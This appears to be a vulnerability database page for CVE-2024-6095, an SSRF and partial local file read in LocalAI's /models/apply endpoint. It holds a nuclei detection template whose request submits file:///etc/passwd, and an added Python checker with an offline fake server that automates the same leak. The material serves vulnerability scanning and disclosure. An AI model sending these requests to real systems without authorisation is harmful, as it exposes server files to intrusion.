LocalAI - Partial Local File Read

03 Jul 2026 03:01:05 · Reported by ProjectDiscovery · Type: nuclei · Source: github.com

LocalAI - Partial Local File Read vulnerability in the /models/apply endpoint

Related records (reporter: title, published)

Circl: CVE-2024-6095, 6 Jul 2024 20:41
CNNVD: LocalAI Code Issues Vulnerabilities, 6 Jul 2024 00:00
CVE: CVE-2024-6095, 6 Jul 2024 17:48
Cvelist: CVE-2024-6095 SSRF and Partial LFI in /models/apply Endpoint in mudler/localai, 6 Jul 2024 17:48
NVD: CVE-2024-6095, 6 Jul 2024 18:15
Positive Technologies: PT-2024-37382 · Unknown · Mudler/Localai, 6 Jul 2024 00:00
RedhatCVE: CVE-2024-6095, 23 May 2025 10:14
Veracode: Server-Side Request Forgery, 8 Jul 2024 04:23
Vulnrichment: CVE-2024-6095 SSRF and Partial LFI in /models/apply Endpoint in mudler/localai, 6 Jul 2024 17:48

Nuclei template
id: CVE-2024-6095

info:
  name: LocalAI - Partial Local File Read
  author: iamnoooob,pdresearch,rootxharsh
  severity: medium
  description: |
    A vulnerability in the /models/apply endpoint of mudler/localai version 2.15.0 allows Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint accepts both http(s):// and file:// URLs; the latter lets the server read a local file, whose content is then echoed back in the YAML decoder's error message. Only a short prefix of the file is returned, because that error message truncates the offending value. The issue can be exploited by any attacker with network access to the LocalAI instance, giving reachability to internal HTTP(s) servers and partial reads of local files. The issue is fixed in version 2.17.
  impact: |
    Attackers can exploit SSRF to access internal HTTP services and partially read local files through error messages, potentially exposing sensitive information.
  remediation: |
    Update LocalAI to version 2.17 or later to address the SSRF and LFI vulnerabilities.
  reference:
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/sev-hack/sev-hack
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6095
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2024-6095
    cwe-id: CWE-918
    epss-score: 0.02475
    epss-percentile: 0.82587
    cpe: cpe:2.3:a:mudler:localai:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mudler
    product: localai
    shodan-query: http.favicon.hash:-976853304
  tags: cve,cve2024,localai,mudler,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /models/apply HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url":"file:///etc/passwd"}

    extractors:
      - type: json
        part: body
        name: uuid
        internal: true
        json:
          - ".uuid"

  - raw:
      - |
        GET /models/jobs/{{uuid}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ': cannot unmarshal !!str `root:x:...`'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f76e05f56f891ed95254f25b57278799b9d360508ced131b6cd972a7ccc87afe022100a46d9e479051e3e98baf63e9d7251d66c7acbba86ced86c251d3a326124305b2:922c64590222798bb761d5b6d8e72950
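The template above encodes a two-step check: submit a `file://` URL to `/models/apply`, take the `uuid` from the response, then fetch `/models/jobs/<uuid>` and look for the file's leading bytes inside the YAML decoder's "cannot unmarshal !!str" error. The matcher string `root:x:...` is the tell for why this is only a partial read: the decoder prints the offending scalar as its first seven characters followed by `...` once the value is longer than ten characters (an assumption about the upstream YAML library's error format, consistent with the matcher on this page), so each request leaks at most a handful of bytes. The following Python is an added example, not ProjectDiscovery's template or LocalAI's code. It drives the same flow through an injectable transport and ships with a constructed fake server so it runs offline; `FakeLocalAI`, `check_partial_lfi`, `extract_leak` and the `"message"` field carrying the error are all illustrative names and assumptions, not LocalAI's real schema. Point the transport at a real HTTP client only for hosts you are authorised to test.

```python
"""Checker for CVE-2024-6095 that walks the same two requests as the nuclei
template: POST /models/apply with a file:// URL, then GET the job status and
look for the file prefix echoed in the YAML decoder's error.

Added example, not ProjectDiscovery's template or LocalAI's code.  The HTTP
transport is injected so the logic runs offline against a constructed fake
server; for a live check, pass callables backed by a real HTTP client."""
import json
import re
from typing import Callable, Optional

# A transport takes (path, json_body_or_None) and returns (status, content_type, body).
Transport = Callable[[str, Optional[dict]], tuple[int, str, str]]

# go-yaml formats a scalar it cannot decode as `<first 7 chars>...` once the
# value is longer than 10 characters, which is why the template's matcher sees
# `root:x:...` and why the read is only "partial".  (Assumption about the
# upstream library's error format; the matcher on the page shows that shape.)
_LEAK_RE = re.compile(r"cannot unmarshal !!str `(?P<prefix>[^`]*?)(?P<trunc>\.\.\.)?`")


def _string_values(obj):
    """Yield every string found anywhere in a decoded JSON document."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _string_values(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _string_values(value)


def extract_leak(job_body: str) -> Optional[dict]:
    """Return {"prefix", "truncated"} if a /models/jobs/<uuid> body leaks file content.

    Which JSON field carries the error text is not pinned down here (assumption:
    it is some string value), so every string in the document is scanned."""
    try:
        job = json.loads(job_body)
    except ValueError:
        return None
    for text in _string_values(job):
        match = _LEAK_RE.search(text)
        if match:
            return {"prefix": match.group("prefix"),
                    "truncated": match.group("trunc") is not None}
    return None


def check_partial_lfi(post: Transport, get: Transport, path: str = "/etc/passwd") -> dict:
    """Submit file://<path> to /models/apply, poll the job, report any leaked prefix."""
    result = {"path": path, "vulnerable": False, "leak": None}
    status, _ctype, body = post("/models/apply", {"url": "file://" + path})
    result["apply_status"] = status
    if status != 200:
        return result
    try:
        uuid = json.loads(body)["uuid"]            # same extractor as the template
    except (ValueError, KeyError, TypeError):
        return result
    status, ctype, body = get("/models/jobs/" + uuid, None)
    result["job_status"] = status
    if status == 200 and "application/json" in ctype:   # template's status + content_type matchers
        leak = extract_leak(body)
        if leak is not None:
            result.update(vulnerable=True, leak=leak)
    return result


class FakeLocalAI:
    """Constructed stand-in for an unpatched instance, for offline runs only.

    Only the behaviour the template relies on is modelled: file:// URLs are read
    and handed to a YAML decoder whose error echoes a truncated prefix.  The JSON
    field names are assumptions, not LocalAI's real schema."""

    def __init__(self, files: dict):
        self.files = files          # path -> content, stands in for the server's filesystem
        self.jobs = {}

    def post(self, path, body):
        if path != "/models/apply" or not body:
            return 404, "text/plain", "not found"
        uuid = "job-%d" % (len(self.jobs) + 1)
        url = body.get("url", "")
        if url.startswith("file://"):
            content = self.files.get(url[len("file://"):])
            if content is None:
                message = "open %s: no such file or directory" % url[len("file://"):]
            else:
                shown = content[:7] + "..." if len(content) > 10 else content
                message = ("yaml: unmarshal errors:\n  line 1: cannot unmarshal "
                           "!!str `%s` into gallery.GalleryModel" % shown)
            self.jobs[uuid] = {"processed": True, "message": message}
        else:
            self.jobs[uuid] = {"processed": True, "message": "ok"}
        return 200, "application/json", json.dumps({"uuid": uuid})

    def get(self, path, _body):
        job = self.jobs.get(path.rsplit("/", 1)[-1])
        if job is None:
            return 404, "text/plain", "no such job"
        return 200, "application/json", json.dumps(job)


if __name__ == "__main__":
    fake = FakeLocalAI({"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"})
    print(check_partial_lfi(fake.post, fake.get))
```

For a live run the template itself is the simpler tool (`nuclei -u https://target -id CVE-2024-6095`); the script is useful when you want the leaked prefix as structured data, or when a host returns the error in a field the word matcher does not cover. Scanning every string in the job body, rather than one fixed field, is deliberate for that reason.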


Scores (current as of 04 Feb 2026 07:00)

Vulners AI Score: 6.2 (medium risk)
CVSS 3.1: 5.8
CVSS 3: 5.8
EPSS: 0.02475